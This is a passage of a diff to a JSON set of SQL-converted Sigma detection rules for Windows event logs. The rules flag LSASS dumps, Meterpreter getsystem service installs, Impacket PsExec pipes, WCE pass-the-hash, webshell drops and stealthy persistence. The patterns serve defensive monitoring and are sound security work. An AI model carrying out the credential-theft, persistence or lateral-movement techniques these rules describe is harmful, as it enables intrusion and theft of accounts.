ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE 